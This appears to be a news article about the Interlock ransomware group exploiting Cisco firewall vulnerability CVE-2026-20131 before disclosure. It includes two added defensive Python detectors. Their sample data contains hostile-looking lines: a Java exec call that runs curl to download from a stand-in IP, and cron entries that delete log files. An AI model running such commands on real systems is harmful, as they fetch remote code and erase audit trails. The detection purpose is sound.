Interlock Ransomware Campaign Exploited Cisco Firewall Vulnerability CVE-2026-20131 Weeks Before Disclosure
- Zero-day exploitation: The Interlock ransomware campaign exploited the critical CVE-2026-20131 vulnerability weeks before public disclosure to compromise enterprise networks.
- Root access gained: This Cisco firewall exploit allows unauthenticated remote attackers to execute arbitrary Java code as root on affected devices.
- Sophisticated attack toolkit: The operators deploy custom remote access trojans, memory-resident webshells and abused legitimate tools, giving them persistent, hard-to-detect control of compromised environments.
An active Interlock ransomware campaign is leveraging a critical vulnerability in Cisco Secure Firewall Management Center software. The threat actors exploited the CVE-2026-20131 vulnerability as a zero-day beginning in January 2026, obtaining privileged access to enterprise networks more than a month before the official public disclosure, according to Amazon threat intelligence researchers.
The CVE-2026-20131 vulnerability, disclosed by Cisco on March 4, 2026, allows unauthenticated remote attackers to execute arbitrary Java code with root privileges.
Executing the Cisco Firewall Exploit
AWS reported observing request bodies that contained attempts to execute Java code, along with two embedded URLs that varied across exploit attempts: one delivering configuration data supporting the exploit, and another confirming successful exploitation “by causing a vulnerable target to perform an HTTP PUT request and upload a generated file.”
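The request-body pattern described above (Java execution attempts plus two embedded URLs, one of them a callback) lends itself to a simple hunting heuristic over web-server or WAF request logs. The following is an added example written for this page, not code from the Amazon report or from Cisco; the record layout, the Java token list, the `/api/example` path and the sample requests are all constructed assumptions, and the token list should be tuned against real telemetry.

```python
"""Hunt for request bodies that embed Java execution code and two URLs.

Added example, not the AWS analysis. Field names, the token list and
the sample records below are constructed assumptions.
"""
import re
from dataclasses import dataclass

# Tokens that commonly appear when a request body tries to run Java code.
# Hypothetical indicator set; extend it from your own telemetry.
JAVA_EXEC_TOKENS = (
    "Runtime.getRuntime().exec(",
    "new ProcessBuilder(",
    "ScriptEngineManager",
    "Class.forName(",
    "getMethod(",
)

# Absolute http(s) URLs with a host, optional port and a path component.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?/[^\s\"'<>]*")


@dataclass(frozen=True)
class HttpRequest:
    src_ip: str
    method: str
    path: str
    body: str


@dataclass(frozen=True)
class Finding:
    src_ip: str
    path: str
    urls: tuple[str, ...]
    tokens: tuple[str, ...]


def embedded_urls(body: str) -> tuple[str, ...]:
    """Distinct URLs found in a request body, in first-seen order."""
    seen: list[str] = []
    for url in URL_RE.findall(body):
        if url not in seen:
            seen.append(url)
    return tuple(seen)


def java_tokens(body: str) -> tuple[str, ...]:
    """Which Java execution tokens the body contains."""
    return tuple(tok for tok in JAVA_EXEC_TOKENS if tok in body)


def is_suspicious(req: HttpRequest) -> bool:
    """Flag a body that carries Java execution tokens AND at least two
    distinct URLs (a config/tooling URL plus a callback URL)."""
    return bool(java_tokens(req.body)) and len(embedded_urls(req.body)) >= 2


def hunt(requests) -> list[Finding]:
    """Return one Finding per suspicious request."""
    return [
        Finding(r.src_ip, r.path, embedded_urls(r.body), java_tokens(r.body))
        for r in requests
        if is_suspicious(r)
    ]


# Constructed sample traffic (not real captures); paths are hypothetical.
SAMPLE_REQUESTS = [
    HttpRequest("10.0.0.5", "POST", "/api/login",
                '{"user":"admin","pass":"..."}'),
    # Java exec + a config URL + a second callback URL: should be flagged.
    HttpRequest("198.51.100.7", "POST", "/api/example",
                'Runtime.getRuntime().exec("curl -o /tmp/cfg '
                'http://203.0.113.10:8080/t1/cfg"); '
                'new java.net.URL("http://203.0.113.10:8080/t1/ok")'
                '.openConnection()'),
    # Java exec but only one URL: below the threshold.
    HttpRequest("198.51.100.8", "POST", "/api/example",
                'new ProcessBuilder("id").start(); '
                '// see http://203.0.113.10:8080/t2/cfg'),
    # Two URLs but no Java tokens: benign.
    HttpRequest("10.0.0.6", "POST", "/api/notes",
                "links: http://intranet.example/a http://intranet.example/b"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_REQUESTS):
        print(f"{f.src_ip} {f.path} urls={f.urls} tokens={f.tokens}")
```

Requiring both signals (execution tokens and two distinct URLs) keeps the rule from firing on ordinary JSON payloads that merely mention a URL; when a hit appears, the second URL is the one to check against egress logs for the PUT upload the report describes.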
The AWS analysis attributed the exploitation to the Interlock ransomware group based on the execution of a malicious ELF binary and associated artifacts. Retrieving the binary exposed an attacker-controlled server that was distributing Interlock’s entire operational toolkit.
“The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromised hosts and uploading operational artifacts back to the staging server,” the Amazon report said.
The operators employ automated PowerShell reconnaissance scripts to systematically enumerate victim environments, collecting hardware specifications, network configurations, and browser artifacts. They install custom remote access trojans (RATs) to establish encrypted WebSocket connections and enable arbitrary command execution.
Evading Detection and Escalating Cybersecurity Risks
To launder their infrastructure, the attackers use Bash scripts that configure Linux servers as HTTP reverse proxies and automatically purge log files every five minutes. They also deploy memory-resident webshells and abuse legitimate tools such as ConnectWise ScreenConnect, Volatility and Certify.
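A server that purges its own logs every five minutes leaves a distinctive scheduling footprint. The following is an added example, not code from the report or from any of the vendors named here, that scans crontab text for high-frequency entries deleting or truncating log files; the crontab lines are constructed, and the path and command patterns are assumptions to be adapted to local conventions.

```python
"""Flag cron entries that purge log files at sub-hourly intervals.

Added example for this page; the sample crontab and the regexes are
constructed assumptions, not indicators from the AWS report.
"""
import re
from dataclasses import dataclass

# Paths that usually hold logs (hypothetical list; extend as needed).
LOG_PATH_RE = re.compile(r"/var/log\b|\.log\b|/(?:nginx|apache2|httpd)/")
# Deletion/truncation idioms: rm/shred/truncate/unlink, '> /path', 'cat /dev/null > ...'.
PURGE_CMD_RE = re.compile(
    r"\b(?:rm|shred|truncate|unlink)\b|\s>\s*/|\bcat\s+/dev/null\s*>"
)


def minute_interval(field: str):
    """Smallest gap in minutes between runs implied by a cron minute field.

    '*' -> 1, '*/N' -> N, 'a,b,c' -> smallest gap (with wrap-around),
    a single value -> 60. Returns None for unsupported syntax (ranges etc.).
    """
    if field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", field)
    if m:
        return int(m.group(1))
    if re.fullmatch(r"\d+(?:,\d+)*", field):
        mins = sorted({int(x) for x in field.split(",")})
        if len(mins) == 1:
            return 60
        gaps = [b - a for a, b in zip(mins, mins[1:])]
        gaps.append(60 - mins[-1] + mins[0])  # wrap from last run to first
        return min(gaps)
    return None


@dataclass(frozen=True)
class CronFinding:
    line_no: int
    interval: int
    command: str


def find_log_purges(crontab: str, max_interval: int = 10) -> list[CronFinding]:
    """Return entries that run at least every `max_interval` minutes,
    every hour of the day, and delete or truncate something under a log path."""
    findings = []
    for n, raw in enumerate(crontab.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # minute hour dom month dow command
        if len(parts) < 6:
            continue
        minute, hour, command = parts[0], parts[1], parts[5]
        if hour != "*":              # only all-day schedules are sub-hourly
            continue
        interval = minute_interval(minute)
        if interval is None or interval > max_interval:
            continue
        if LOG_PATH_RE.search(command) and PURGE_CMD_RE.search(command):
            findings.append(CronFinding(n, interval, command))
    return findings


# Constructed sample crontab; line 1 is the comment.
SAMPLE_CRONTAB = """\
# constructed sample, not from a real host
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * rm -f /var/log/nginx/access.log /var/log/nginx/error.log
*/5 * * * * cat /dev/null > /var/log/auth.log
0 */6 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /opt/proxy/healthcheck.sh
"""

if __name__ == "__main__":
    for f in find_log_purges(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: every {f.interval} min: {f.command}")
```

The hour-field check matters: a nightly `rm` of rotated logs is routine housekeeping, while a deletion that fires every five minutes around the clock is what the report describes. On a live host the same function can be fed the output of `crontab -l` for each user plus the contents of `/etc/cron.d`.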
Arctic Wolf strongly recommends that customers use Cisco’s Software Checker to verify whether they are running an affected release and immediately apply the security patches for Cisco Secure Firewall Management Center, alongside defense-in-depth controls for the surrounding infrastructure.
CVE-2026-20131 also affects Cisco Security Cloud Control (SCC) Firewall Management, Arctic Wolf noted; Cisco has already updated that service as part of routine maintenance, so no user action is required for it.
Interlock was suspected of attacks on the Kalamazoo Public Schools District and Wayne County last year.